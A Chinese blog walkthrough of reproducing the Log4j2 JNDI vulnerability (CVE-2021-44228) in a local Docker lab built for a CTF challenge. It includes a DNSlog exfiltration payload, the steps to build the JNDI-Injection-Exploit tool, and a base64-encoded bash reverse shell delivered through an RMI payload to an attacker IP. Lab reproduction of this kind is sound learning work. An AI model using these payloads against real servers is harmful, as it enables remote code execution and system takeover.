Log4j2学习与复现

已于 2022-07-25 01:51:57 修改
阅读量3.5k 收藏 3
点赞数
分类专栏: 信息安全漏洞 代码审计与漏洞分析 文章标签: log4j2 漏洞复现 java
于 2022-02-28 14:26:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49422880/article/details/123180416
版权
本文档详细记录了Log4j2漏洞的复现过程,包括Dockerfile和docker-compose.yml的编写,环境搭建,利用JNDI进行数据外带和反弹shell的步骤。实验中,通过修改端口避免冲突,并使用特定工具生成恶意代码,最终成功反弹shell获取flag。
摘要由CSDN通过智能技术生成

Log4j2学习与复现

0x01 前言

  这几天在给新生赛出题,打算出real world的题目。就顺便把real world的赛题给复现一遍。网上其实也有很多的教程主要是环境的搭建以及Dockerfile和docker-compsoe.yml的编写。

实验环境:
| 环境 | 版本 | IP|
|–|–|–|–|
|靶场|ubuntu 18 & vulfocus/log4j2-cve-2021-44228| 192.168.43.139|
|攻击机 |kali Linux 2021 | 192.168.43.77 |
工具下载:JNDI.

0x02 Dokerfile的编写

Dokerfile

FROM vulfocus/log4j2-cve-2021-44228

RUN apt-get update

COPY flag /flag

因为还不是很熟悉原理是什么,无法完全地构建本地靶场,用的还是vulfocus下的镜像。这一个镜像默认打开的端口是8080,为了避免冲突在docker-compsoe.yml中我们需要做一个端口映射。

0x03 docker-compsoe.yml的编写

docker-compsoe.yml

version: "2"

services:
  log4j2:
    build: .
    restart: "always"
    ports:
      - "9999:8080"

这里我把原来的端口映射到了9999端口,本地再放一个flag文件。
在这里插入图片描述

0x05 复现

1.化境启动

到那一个目录下输入docker-compose build 拉取相关的镜像
在这里插入图片描述
然后 docker images查看是否拉取成功。
在这里插入图片描述
接着docer-compose up -d,直接启动环境
再使用docker ps -a 进行容器的查看
在这里插入图片描述
成功构建该容器,然后使用win7物理机查看。构建成功。
在这里插入图片描述

2.复现

1、首先查看是否能外带出数据(靶场绝对是可以的)
这里的靶场环境是get传参数,那么是要进行一次的url编码。

hello?payload=${jndi:ldap://y5bapy.dnslog.cn/exp}

刷新一下,去dnslog就能看到有外带的数据。
在这里插入图片描述

在这里插入图片描述
2、接下来需要构建一个恶意数据进行数据监听,构造payload,这里是直接构造反弹shell的恶意代码。
工具下载:git clone https://gitee.com/Lemon_i/JNDI-Injection-Exploit.git
然后打包项目:mvn clean package -DskipTests
如果提示没有mvn的话就下一个:apt-get install maven
在这里插入图片描述
开始构造恶意数据。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjc3LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.43.77"

echo 后面的一串字符串YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjc3LzEyMzQgMD4mMQ==是恶意代码
bash -i >& /dev/tcp/192.168.43.77/1234 0>&1的base64的编码。-A 之后的那一串IP就是攻击机的IP地址,按照这个去构造基本就可以了。
在这里插入图片描述
最后虚拟机监听端口使用上面生成的恶意代码向服务器发送即可反弹shell。

url/hello/?payload=%24%7Bjndi%3Armi%3A%2F%2F192.168.43.77%3A1099%2FExploitBypass%7D

在这里插入图片描述
成功反弹,拿到flag。

0x06 原理分析

持续更新

小蓝同学`
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】Apache Log4j2 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
07-20 896
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 9854
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
日志--门面及实现框架 自用解析
cq724165616的博客
05-16 789
日志 概述 日志文件是用于记录系统操作时间的文件集合。可分为事件日志和消息日志。具有处理历史数据、诊断问题的追踪以及理解系统的活动等重要作用。 调试日志 开发中使用日志能够更加灵活和方便的去重现开发中的的bug问题。 系统日志 系统日志是记录系统中硬件、软件和系统问题的信息,还可以监视系统中发生的事件。可以通过它来检查错误发生的原因,或者寻找受到攻击时攻击者留下的痕迹。 java日志框架 日志门面 : JCL 、 slf4j 日志实现 : JUL 、 l
log4j2 实际使用详解
热门推荐
人不风流枉少年
05-12 14万+
一、目录简介 基础部分 日志框架简单比较(slf4j、log4j、logback、log4j2log4j2基础知识 log4j2实用配置 实战部分 slf4j + log4j2 实际使用 二、日志框架比较(slf4j、log4j、logback、log4j2 ) 日志接口(slf4j) slf4j是对所有日志框架制定的一种规范、标准、接口,并不是一个框架的具体的实现,因为接口并不能独立使
Log4j2漏洞复现&原理&补丁绕过
最新发布
无问社区的博客
07-17 501
我tm都呕了,昨晚出了这个洞,在家复现半天没搞出来,然后凌晨快两点的时候成功了两次,然后又不行,然后睡了,贼jb真实。然后今天来公司随便搞了两下就成功了,唯一的变化就是换了台电脑,贼jb恐怖。经过测试就是jdk版本的问题。0x02 漏洞复现这里我一共使用了两个jdk版本8u202的情况比较特殊,其实我今天凌晨在家里用的也是8u202的版本,失败了。今天来公司也是用的8u202版本的jdk,成功了。
log4j2复现
weixin_65219040的博客
06-18 530
目录环境搭建log4j2 DNSLog测试JNDI注入反弹shell 靶机:Ubuntu 5.4.0-117-generic   192.168.6.183 攻击机:Kali 5.16.0-kali7-amd64 192.168.6.212 靶机: #首先拉一个docker镜像 docker pull vulfocus/vulfocus #查看镜像 docker images #启动 docker run -d -p 8081:80 -v /var/run/docker.sock:/var
log4j2问题复现
weixin_44676079的博客
12-14 219
log4j2BUG
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
Log4j2学习记录
weixin_44521586的博客
09-17 907
Log4j2学习日志门面和实现运用1.获取logger1.1.getLogger()调用流程1.2.格式化输出1.3.LogBuilder2.配置文件 日志门面和实现 三种门面:jcl(commons logging)、slf4j、log4j-api 具体实现和桥接关系如下图 log4j2的api和实现 运用 1.获取logger getLogger()方法可接受不同参数,参数最终定义为该logger的名称,与配置文件中<logger/>标签对应 LogManager.getLogger(
log4j2学习笔记
feiying00544的博客
05-13 683
一.配置位置 1.log4j2配置格式上与log4j已经不同了,log4j2不再支.properties格式,只能是.xml,.json或.jsn 2.log4j2的配置文件需命名为log4j2 3.默认会在classpath里寻找log4j2的配置文件,可在web.xml里按如下配置 <context-param> <param-name>log4jCo...
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
Log4j2 RCE 漏洞复现步骤以及根因
weixin_46073333的博客
12-12 6806
相信大家最近一定被log4j2的远程代码执行漏洞所刷屏了,各个互联网厂商,开源组织,还有相关企业都瑟瑟发抖,相关研发人员也都是加班加点紧急修复和改正。笔者也看了一些相关文章,感觉不少都...
Log4J2 靶场漏洞复现
weixin_47019868的博客
12-18 9966
北京时间12月9号深夜,Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228。相关地址NVD - CVE-2021-44228 本次漏洞复现采用vulfocus的log4j2靶场docker 使用Kali系统进行复现实验 在Kali系统
log4j2漏洞复现
qq_60905276的博客
09-24 1024
log4j2log4j的升级版本,基于java的日志框架,在java项目中被大量的引用,当用户输入数据被记录于日志中,攻击者可通过构造特殊请求,造成JNDI注入,来触发log4j达到命令执行,JNID可访问的目录服务有lLDAP,JDBC,RMI,DNS,NIS,CORBA,JNDI是java提供的一个java命令和目录接口,可通过其调用定位资产和程序对象。
log4j2复现(小宇特详解)
小宇的web博客
02-19 787
log4j2复现(小宇特详解) 简介 ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。 漏洞概述 该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。 log4j2是调用了jndi来查询一些信息然后记录到了日志里面。 jndi是java一套资源和使用的接口,用来将各种资源做整合 idap是一种文件访问协议,用来获取文件资源 rmi是远程方法执行,是RPC的纯java实现方
Log4j2漏洞复现(CVE-2021-44228)
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
log4j2的使用
chens616的专栏
07-19 3079
log4j2简介 logback是由log4j的创始人开发的新日志框架,包括三个模块: logback-core logback-classic logback-access logback-core是核心模块,logback-classic是日志框架,相当于log4j,logback很好的实现了slf4j,logback-access提供跟web 容器有关的日志访问功能。 logback与l...
Log4j2安全漏洞复现及解决
"此资源主要关于在log4j2版本2.15及以下版本中复现一个bug的情况。" 在Log4j库的历史中,有一个非常重要的安全漏洞,该漏洞存在于Log4j 1.x以及Log4j 2.x的早期版本中。此文档似乎是在尝试复现Log4j2的一个特定版本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值